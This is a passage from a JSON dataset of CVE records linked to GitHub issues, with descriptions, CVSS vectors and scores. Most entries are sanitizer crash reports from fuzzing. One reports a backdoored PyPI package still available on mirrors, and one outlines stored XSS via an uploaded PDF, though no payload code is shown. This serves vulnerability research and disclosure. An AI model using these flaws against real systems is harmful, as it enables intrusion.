  84324. "Repo_new": "dreambuilder4028/coder",
  84325. "Issue_Created_At": "2022-06-12T05:47:12Z",
  84326. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install beginner NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84327. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84328. "severity": "CRITICAL",
  84329. "baseScore": 9.8,
  84330. "impactScore": 5.9,
  84331. "exploitabilityScore": 3.9
  84332. },
  84333. {
  84334. "CVE_ID": "CVE-2022-33009",
  84335. "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/30",
  84336. "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/30",
  84337. "Repo_new": "eddy8/lightcms",
  84338. "Issue_Created_At": "2022-06-06T16:26:44Z",
  84339. "description": "A stored cross site scripting (XSS) vulnerability exists in APITAG \"contents\" field. A stored cross site scripting (XSS) vulnerability exists in APITAG that allows an user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack NUMBERTAG login as admin in the article page FILETAG NUMBERTAG create a new article FILETAG NUMBERTAG upload the malicious pdf. the content of FILETAG : CODETAG NUMBERTAG back to content then wo edit this upload: FILETAG NUMBERTAG when user click the link it will trigger a XSS attack FILETAG FILETAG",
  84340. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  84341. "severity": "MEDIUM",
  84342. "baseScore": 4.8,
  84343. "impactScore": 2.7,
  84344. "exploitabilityScore": 1.7
  84345. },
  84346. {
  84347. "CVE_ID": "CVE-2022-33021",
  84348. "Issue_Url_old": "https://github.com/openhwgroup/cva6/issues/884",
  84349. "Issue_Url_new": "https://github.com/openhwgroup/cva6/issues/884",
  84350. "Repo_new": "openhwgroup/cva6",
  84351. "Issue_Created_At": "2022-05-24T22:43:58Z",
  84352. "description": "FILETAG FILETAG",
  84353. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  84354. "severity": "HIGH",
  84355. "baseScore": 7.5,
  84356. "impactScore": 3.6,
  84357. "exploitabilityScore": 3.9
  84358. },
  84359. {
  84360. "CVE_ID": "CVE-2022-33023",
  84361. "Issue_Url_old": "https://github.com/openhwgroup/cva6/issues/885",
  84362. "Issue_Url_new": "https://github.com/openhwgroup/cva6/issues/885",
  84363. "Repo_new": "openhwgroup/cva6",
  84364. "Issue_Created_At": "2022-05-25T00:52:21Z",
  84365. "description": "FILETAG Our testcase shows cva6 will not throw illegal instruction exception in this case while spike does at line NUMBERTAG FILETAG The testcase mem file, rtl trace log, and spike trace log are attached. FILETAG Thank you",
  84366. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  84367. "severity": "HIGH",
  84368. "baseScore": 7.5,
  84369. "impactScore": 3.6,
  84370. "exploitabilityScore": 3.9
  84371. },
  84372. {
  84373. "CVE_ID": "CVE-2022-33024",
  84374. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/492",
  84375. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/492",
  84376. "Repo_new": "libredwg/libredwg",
  84377. "Issue_Created_At": "2022-06-07T01:43:47Z",
  84378. "description": "Assertion dwg2dxf: APITAG int APITAG BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, APITAG , APITAG ): Assertion ERRORTAG !dat >bit' failed. Aborted poc URLTAG",
  84379. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  84380. "severity": "HIGH",
  84381. "baseScore": 7.5,
  84382. "impactScore": 3.6,
  84383. "exploitabilityScore": 3.9
  84384. },
  84385. {
  84386. "CVE_ID": "CVE-2022-33025",
  84387. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/487",
  84388. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/487",
  84389. "Repo_new": "libredwg/libredwg",
  84390. "Issue_Created_At": "2022-06-07T01:31:30Z",
  84391. "description": "heap use after free exists in the function APITAG in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG ffff7e NUMBERTAG at pc NUMBERTAG ca bp NUMBERTAG fffffffc8b0 sp NUMBERTAG fffffffc8a8 READ of size NUMBERTAG at NUMBERTAG ffff7e NUMBERTAG thread T NUMBERTAG c9 in APITAG PATHTAG NUMBERTAG d0a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG ffff7e NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG d NUMBERTAG in realloc PATHTAG NUMBERTAG a NUMBERTAG b5 in dwg_add_object PATHTAG previously allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG a NUMBERTAG in dwg_add_object PATHTAG SUMMARY: APITAG heap use after free PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG efbeab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbead0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84392. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84393. "severity": "HIGH",
  84394. "baseScore": 7.8,
  84395. "impactScore": 5.9,
  84396. "exploitabilityScore": 1.8
  84397. },
  84398. {
  84399. "CVE_ID": "CVE-2022-33026",
  84400. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/484",
  84401. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/484",
  84402. "Repo_new": "libredwg/libredwg",
  84403. "Issue_Created_At": "2022-06-07T01:21:33Z",
  84404. "description": "heap buffer overflow exists in the function bit_calc_CRC in bits.c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e1 bp NUMBERTAG fffffffca NUMBERTAG sp NUMBERTAG fffffffca NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG e0 in bit_calc_CRC PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG cdd0 in dat_read_file PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in bit_calc_CRC Shadow bytes around the buggy address NUMBERTAG c2c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG a NUMBERTAG c2c7fff NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84405. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84406. "severity": "HIGH",
  84407. "baseScore": 7.8,
  84408. "impactScore": 5.9,
  84409. "exploitabilityScore": 1.8
  84410. },
  84411. {
  84412. "CVE_ID": "CVE-2022-33027",
  84413. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/490",
  84414. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/490",
  84415. "Repo_new": "libredwg/libredwg",
  84416. "Issue_Created_At": "2022-06-07T01:40:09Z",
  84417. "description": "heap use after free exists in the function dwg_add_handleref in dwg.c . system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG bp NUMBERTAG fffffffc7d0 sp NUMBERTAG fffffffc7c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG in dwg_add_handleref PATHTAG NUMBERTAG ea NUMBERTAG in dwg_add_BLOCK_HEADER PATHTAG NUMBERTAG baf6 in APITAG PATHTAG NUMBERTAG d0a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG d NUMBERTAG a0 in APITAG PATHTAG NUMBERTAG a2 in APITAG PATHTAG NUMBERTAG d (<unknown module>) previously allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG c in dwg_new_ref PATHTAG SUMMARY: APITAG heap use after free PATHTAG in dwg_add_handleref Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fd fd fd fd[fd]fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84418. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84419. "severity": "HIGH",
  84420. "baseScore": 7.8,
  84421. "impactScore": 5.9,
  84422. "exploitabilityScore": 1.8
  84423. },
  84424. {
  84425. "CVE_ID": "CVE-2022-33028",
  84426. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/489",
  84427. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/489",
  84428. "Repo_new": "libredwg/libredwg",
  84429. "Issue_Created_At": "2022-06-07T01:37:45Z",
  84430. "description": "heap buffer overflow exists in the function dwg_add_object in decode.c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG ac NUMBERTAG at pc NUMBERTAG bc NUMBERTAG bp NUMBERTAG fffffffc7c0 sp NUMBERTAG fffffffbf NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG e NUMBERTAG ac NUMBERTAG thread T NUMBERTAG bc NUMBERTAG in __asan_memset PATHTAG NUMBERTAG a NUMBERTAG e in dwg_add_object PATHTAG NUMBERTAG e NUMBERTAG in dwg_add_VIEW PATHTAG NUMBERTAG c NUMBERTAG e in APITAG PATHTAG NUMBERTAG d7a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG e NUMBERTAG ac NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in realloc PATHTAG NUMBERTAG b9ca in APITAG PATHTAG NUMBERTAG d7a in APITAG PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memset Shadow bytes around the buggy address NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84431. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84432. "severity": "HIGH",
  84433. "baseScore": 7.8,
  84434. "impactScore": 5.9,
  84435. "exploitabilityScore": 1.8
  84436. },
  84437. {
  84438. "CVE_ID": "CVE-2022-33032",
  84439. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/488",
  84440. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/488",
  84441. "Repo_new": "libredwg/libredwg",
  84442. "Issue_Created_At": "2022-06-07T01:34:49Z",
  84443. "description": "heap buffer overflow exists in the function APITAG in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG dc bp NUMBERTAG fffffffca NUMBERTAG sp NUMBERTAG fffffffc9f8 WRITE of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG db in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG f0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84444. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84445. "severity": "HIGH",
  84446. "baseScore": 7.8,
  84447. "impactScore": 5.9,
  84448. "exploitabilityScore": 1.8
  84449. },
  84450. {
  84451. "CVE_ID": "CVE-2022-33033",
  84452. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/493",
  84453. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/493",
  84454. "Repo_new": "libredwg/libredwg",
  84455. "Issue_Created_At": "2022-06-08T01:47:21Z",
  84456. "description": "double free exists in the function dwg_read_file in dwg.c . system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG a NUMBERTAG in thread T NUMBERTAG d NUMBERTAG a0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG a in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG cdd0 in dat_read_file PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG double free PATHTAG in APITAG NUMBERTAG ABORTING poc URLTAG",
  84457. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84458. "severity": "HIGH",
  84459. "baseScore": 7.8,
  84460. "impactScore": 5.9,
  84461. "exploitabilityScore": 1.8
  84462. },
  84463. {
  84464. "CVE_ID": "CVE-2022-33034",
  84465. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/494",
  84466. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/494",
  84467. "Repo_new": "libredwg/libredwg",
  84468. "Issue_Created_At": "2022-06-08T01:51:23Z",
  84469. "description": "stack buffer overflow exists in the function copy_bytes in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffc8f0 at pc NUMBERTAG bb bp NUMBERTAG fffffffbc NUMBERTAG sp NUMBERTAG fffffffbc NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fffffffc8f0 thread T NUMBERTAG ba in copy_bytes PATHTAG NUMBERTAG ba in decompress_r NUMBERTAG PATHTAG NUMBERTAG in read_file_header PATHTAG NUMBERTAG in read_r NUMBERTAG meta_data PATHTAG NUMBERTAG in decode_R NUMBERTAG PATHTAG NUMBERTAG in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG ) Address NUMBERTAG fffffffc8f0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in read_r NUMBERTAG meta_data PATHTAG This frame has NUMBERTAG object(s NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG str.i NUMBERTAG sec_dat.i NUMBERTAG str_dat.i NUMBERTAG ptr.i NUMBERTAG data.i NUMBERTAG file_header' APITAG NUMBERTAG fff NUMBERTAG f3]f NUMBERTAG fff NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
  84470. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84471. "severity": "HIGH",
  84472. "baseScore": 7.8,
  84473. "impactScore": 5.9,
  84474. "exploitabilityScore": 1.8
  84475. },
  84476. {
  84477. "CVE_ID": "CVE-2022-33067",
  84478. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/224",
  84479. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/224",
  84480. "Repo_new": "ckolivas/lrzip",
  84481. "Issue_Created_At": "2022-05-04T08:48:54Z",
  84482. "description": "APITAG invalid shifts. Describe the bug APITAG two runtime errors that expose invalid integer shifts in the library. To Reproduce Built lrzip using clang NUMBERTAG with CXXFLAGS and/or CFLAGS ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcases: FILETAG",
  84483. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84484. "severity": "MEDIUM",
  84485. "baseScore": 5.5,
  84486. "impactScore": 3.6,
  84487. "exploitabilityScore": 1.8
  84488. },
  84489. {
  84490. "CVE_ID": "CVE-2022-33068",
  84491. "Issue_Url_old": "https://github.com/harfbuzz/harfbuzz/issues/3557",
  84492. "Issue_Url_new": "https://github.com/harfbuzz/harfbuzz/issues/3557",
  84493. "Repo_new": "harfbuzz/harfbuzz",
  84494. "Issue_Created_At": "2022-04-29T15:03:57Z",
  84495. "description": "APITAG signed integer overflow. Describe the bug APITAG signed integer overflow in hb ot shape fallback.cc To Reproduce Built harfbuzz shape fuzzer using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcase: FILETAG",
  84496. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84497. "severity": "MEDIUM",
  84498. "baseScore": 5.5,
  84499. "impactScore": 3.6,
  84500. "exploitabilityScore": 1.8
  84501. },
  84502. {
  84503. "CVE_ID": "CVE-2022-33069",
  84504. "Issue_Url_old": "https://github.com/ethereum/solidity/issues/12973",
  84505. "Issue_Url_new": "https://github.com/ethereum/solidity/issues/12973",
  84506. "Repo_new": "ethereum/solidity",
  84507. "Issue_Created_At": "2022-04-29T16:12:49Z",
  84508. "description": "ERRORTAG Solidity assertion failed in in APITAG Describe the bug The attached testcase crashes the solidity compiler solc with an ERRORTAG Solidity assertion failed in in APITAG URLTAG To Reproduce Built solc_ossfuzz using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG Crash Output ERRORTAG zipped testcase to reproduce: FILETAG",
  84509. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84510. "severity": "MEDIUM",
  84511. "baseScore": 5.5,
  84512. "impactScore": 3.6,
  84513. "exploitabilityScore": 1.8
  84514. },
  84515. {
  84516. "CVE_ID": "CVE-2022-33082",
  84517. "Issue_Url_old": "https://github.com/open-policy-agent/opa/issues/4762",
  84518. "Issue_Url_new": "https://github.com/open-policy-agent/opa/issues/4762",
  84519. "Repo_new": "open-policy-agent/opa",
  84520. "Issue_Created_At": "2022-06-09T13:10:19Z",
  84521. "description": "Shadowing of called functions in comprehension heads can cause compiler panic. If a local var in a comprehension body overrides a function call in the comprehension head, it will never be possible to make that call. ERRORTAG Will cause an eval time error: ERRORTAG A compile time error should be introduced for capturing this case. A special case exists that will cause a compiler panic: ERRORTAG APITAG => ERRORTAG",
  84522. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  84523. "severity": "HIGH",
  84524. "baseScore": 7.5,
  84525. "impactScore": 3.6,
  84526. "exploitabilityScore": 3.9
  84527. },
  84528. {
  84529. "CVE_ID": "CVE-2022-33082",
  84530. "Issue_Url_old": "https://github.com/open-policy-agent/opa/issues/4761",
  84531. "Issue_Url_new": "https://github.com/open-policy-agent/opa/issues/4761",
  84532. "Repo_new": "open-policy-agent/opa",
  84533. "Issue_Created_At": "2022-06-09T12:47:04Z",
  84534. "description": "opa eval panics when using APITAG . ERRORTAG",
  84535. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  84536. "severity": "HIGH",
  84537. "baseScore": 7.5,
  84538. "impactScore": 3.6,
  84539. "exploitabilityScore": 3.9
  84540. },
  84541. {
  84542. "CVE_ID": "CVE-2022-33092",
